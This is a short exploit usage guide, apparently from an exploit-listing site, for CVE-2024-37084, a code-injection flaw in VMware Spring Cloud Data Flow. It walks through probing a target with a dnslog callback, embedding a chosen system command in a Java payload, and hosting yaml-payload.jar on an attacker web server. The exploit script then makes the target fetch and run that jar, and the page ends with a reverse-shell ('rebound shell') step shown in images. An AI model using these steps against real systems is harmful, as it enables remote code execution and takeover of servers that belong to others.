Exploit for Code Injection in Vmware Spring_Cloud_Data_Flow CVE-2024-37084

## https://sploitus.com/exploit?id=4218439B-9CA7-592C-B2B6-826415150810
1. Use dnslog to detect whether CVE-2024-37084 vulnerability exists, Then manually check dnslog
   
`python cve-2024-37084-exp.py -u http://192.168.67.135:7577 -dnslog xxx.dnslog.cn`

2. then you can Execute system commands
   
**first:** Enter the command you want to execute in src\artsploit\AwesomeScriptEngineFactory.java

![image](https://github.com/user-attachments/assets/bca82f8a-1b22-4cf8-adb9-96e5650153d2)

**after that:** Double-click the. py file to generate the yaml-payload.jar file.

![image](https://github.com/user-attachments/assets/c6964441-dc24-44a0-8ae4-c5bc3888e70d)

**after that:** Put yaml-payload.jar on the linux server and start a web service with python. Note: Every time you execute a different command, you need to rename yaml-payload.jar, that is, xx.jar that you access, with a different name every time. Otherwise the new command will not take effect.

The access path is as follows: http://192.168.67.133/yaml-payload.jar.

**finally:** Execute poc

`cve-2024-37084-exp.py -u http://192.168.67.135:7577 -payload http://192.168.67.133/yaml-payload.jar`

![image](https://github.com/user-attachments/assets/13536acf-afb8-4e7d-adf8-629aab9b3157)

Enter the corresponding container to view and successfully execute the command.

![image](https://github.com/user-attachments/assets/910021ef-ec3d-4536-b4af-e0c8f86f2d2c)

**Rebound shell:**
![image](https://github.com/user-attachments/assets/24a0bfc1-62f3-4489-bd81-461c6a2955ea)
![image](https://github.com/user-attachments/assets/b6f7cecf-20cd-406e-9fc2-e1284719d7ac)